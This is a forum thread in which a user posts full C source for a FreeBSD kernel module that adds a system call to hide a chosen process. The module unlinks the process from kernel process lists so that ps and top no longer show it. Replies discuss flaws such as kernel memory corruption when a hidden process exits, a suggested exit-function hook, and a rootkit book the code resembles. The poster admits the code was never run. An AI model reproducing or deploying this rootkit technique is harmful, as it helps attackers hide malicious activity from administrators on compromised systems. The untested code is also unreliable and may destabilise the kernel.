Jump to content

Recommended Posts

Posted

So, I was on the plane today for a few hours and got bored and for some reason i had printed copies of a few kernel source files for FreeBSD and i thought i would whip up something a little fun. This Little kernel module loads a system call into the system that will allow the user to hide processes, now just a warning, i haven't actually run this code, but i believe that it will compile perfectly, and im pretty sure that it covers all the  bases hiding processes wise, but just to be sure, not actually try to hide processes with this code from someone who knows what they are doing ;)

#include <sys/types.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/queue.h>
#include <sys/lock.h>
#include <sys/sx.h>
#include <sys/mutex.h>

struct proc_hiding_args {
        pid_t p_pid;
};

static int proc_hiding(struct thread *td, void *syscall_args) {
        struct proc_hiding_args *uap;
        uap = (struct proc_hiding_args *)syscall_args;

        struct proc *p;

        sx_xlock(&allproc_lock);
        sx_xlock(&proctree_lock);

        LIST_FOREACH(p, PIDHASH(uap->p_pid), p_hash)
                if (uap->p_pid == p->p_pid) {
                        if (p->p_state == PRS_NEW) {
                                p = NULL;
                                break;
                        }

                        PROC_LOCK(p);
                        LIST_REMOVE(p, p_hash);
                        LIST_REMOVE(p, p_list);
                        LIST_REMOVE(p, p_sibling);
                        leavepgrp(p);
                        nprocs--;
                        PROC_UNLOCK(p);

                        break;
                }

        sx_xunlock(&allproc_lock);
        sx_xunlock(&proctree_lock);

        return(0);
}

static struct sysent proc_hiding_sysent = {
        1,
        proc_hiding
};

static int offset = NO_SYSCALL;

static int load(struct module *module, int cmd, void*arg) {
        int error = 0;

        switch (cmd) {
        case MOD_LOAD:
                uprintf("Loaded System call at offset %d", offset);
                break;

        case MOD_UNLOAD:
                uprintf("Unloaded System call at offset %d", offset);
                break;

        default:
                error = EOPNOTSUPP;

        }
        return (error);
}

SYSCALL_MODULE(proc_hiding, &offset, &proc_hiding_sysent, load, NULL);

Meh, have fun, if you see a problem then post it ;)

  • 3 weeks later...
Posted

No one probably cares, but i thought i would point out that if a process is hidden and then for some reason is forced to exit, kernel memory will most probably be corrupted... The kernel will run through lists looking for the process and because it wont find the process it will run into, well... problems. To fix this it would be clever to hook either the exit function or provide some measure to find out if a process removed is about to die/be killed and add it to the lists again... whatever :)

Posted
Nope, neither will top or a few other methods :) (Not sure if it will totally make it invisible from an experienced user)

What about a

ps -auxf

as root.

Posted

I dont have a VM with BSD on it right now, but thinking how ps works i believe that the way i have removed the process from all structures ps queries to display a process... Er I think that means, yes it will hide it from ps -auxf

Posted
I dont have a VM with BSD on it right now, but thinking how ps works i believe that the way i have removed the process from all structures ps queries to display a process... Er I think that means, yes it will hide it from ps -auxf

Ah.. that was stupid of me. I posted that earlier in the day... I had this stupid idea that by grabbing location of process it could bypass this in some way. Actually reading the code I see I am wrong.

Posted

Not really, flicked through it at a bookstore once, seme to remeber it had intersting ideas on detecting hidden kernel modules and wiritng to kernel land memory..

Posted
Not really, flicked through it at a bookstore once, seme to remeber it had intersting ideas on detecting hidden kernel modules and wiritng to kernel land memory..

Ah, I see.  It may just be that the methods of coding such things have been relatively uniform over time; your code block looks to be about 90% the same as one of Kong's code listings.  I'm not trying to ruffle any feathers, but I had just figured it was heavily based on how he did things in that book.

Cheers

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...